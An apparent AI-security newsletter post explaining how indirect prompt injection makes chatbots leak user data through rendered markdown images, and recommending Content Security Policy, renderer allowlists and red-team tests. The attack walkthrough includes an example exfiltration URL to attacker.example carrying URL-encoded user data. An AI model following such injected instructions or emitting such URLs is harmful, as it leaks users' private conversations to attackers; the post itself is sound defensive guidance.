How LLM Chatbots Leak Data Through Their Own Rendered Output
A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server. Why this works, why CSP is the real fix, and what to check this week.
One vulnerability class keeps reappearing in AI-security write-ups under slightly different names, across many different chatbot products: data exfiltration through the model’s own rendered output. It is worth a standalone briefing because the root cause is almost never the model — it is the rendering layer the product team built around the model, and the fix is a web-security control most LLM teams have not applied to the chat surface.
The attack, end to end
The setup requires two ingredients that modern assistants routinely provide: the model can be influenced by untrusted content (via indirect prompt injection — a web page, a document, an email it processes), and the UI renders the model’s markdown, including images.
The chain:
- A user asks the assistant to summarize an attacker-controlled document or web page.
- Hidden text in that content instructs the model: take the user’s earlier messages (or retrieved private context) and append them, URL-encoded, to an image link pointing at an attacker server.
- The model, following the injected instruction, emits markdown like an inline image whose URL is
https://attacker.example/log?d=<the user's data, url-encoded>. - The chat UI renders the markdown. To display the “image,” the browser issues a GET request to the attacker’s server. The data is now in the attacker’s logs. No click is required; rendering is the trigger.
The user sees, at most, a broken image icon. The exfiltration already happened.
Why this keeps shipping
It recurs because the model and the UI are usually built by people reasoning about different threats. The model team is focused on what the model says. The UI team renders markdown because it makes responses look good. Neither owns the question “what happens when the model is induced to emit an attacker-chosen URL and our renderer dutifully fetches it.” The vulnerability lives in the seam between them, which is exactly the seam nobody is assigned to defend.
Output filtering at the model layer helps but is not sufficient — it is the same losing game as filtering injection on the input side. A determined payload will find an emission the filter does not catch.
The real fix is a browser control, not a model control
The durable mitigation is to deny the rendering layer the ability to make arbitrary outbound requests on the model’s behalf:
- Content Security Policy. A restrictive
img-src(andconnect-src,frame-src,style-src) that allows only your own asset origins means an attacker-chosen image URL simply does not load. The browser refuses the request. This converts a working exfiltration channel into an inert broken-image icon. It is the highest-leverage control and most chat UIs ship without it. - URL allowlisting in the renderer. Before rendering model output, rewrite or strip image and link targets that are not on an allowlist. Defense in depth behind CSP, useful where CSP is hard to scope tightly.
- Don’t auto-load remote media in chat at all. Many assistants have no legitimate need to inline arbitrary remote images from model output. Click-to-load, or no remote media, removes the channel entirely.
- Treat model output as untrusted before it touches the DOM. The same principle as tool calls: anything the model emits that becomes a network request must clear a non-model check first.
What to check this week
- Open your assistant’s chat UI and inspect the response Content-Security-Policy header. If
img-srcallows*or has no policy, you have the channel. - Trace what your renderer does with model-emitted markdown images and links. If it fetches them with no allowlist, that is the finding.
- Add a deliberate test to your red-team set: an injected instruction that asks the model to encode prior context into an image URL. If the request reaches your test server, the vulnerability is live.
- Prioritize CSP over output filtering. Filtering is an arms race; a tight
img-srcis a wall.
The summary that holds across every product this has hit: the model emitting a bad URL is not preventable, but the browser fetching it is. Fix the rendering layer, not just the prompt.
— Theo
Sources
AI Sec Weekly — in your inbox
Weekly digest of AI security news and analysis. — delivered when there's something worth your inbox.
No spam. Unsubscribe anytime.
Related
Indirect Prompt Injection: The Agent Era's Default Vulnerability
As LLM agents gained tools and memory, the dangerous injection stopped coming from the user and started coming from the data the agent reads. A defender's breakdown of why this class resists patching and what containment looks like.
The OWASP LLM Top 10 (2025) Changed More Than the Numbering
The 2025 revision of the OWASP Top 10 for LLM Applications added system-prompt leakage and vector/embedding weaknesses, and reframed the supply-chain entry. Here's what actually shifted and why it matters for defenders.
How AI Sec Weekly Works: The Format and Why It Looks This Way
Every Friday digest follows the same structure for a reason. Here's the format breakdown — three top stories, the reading list, and what gets left out.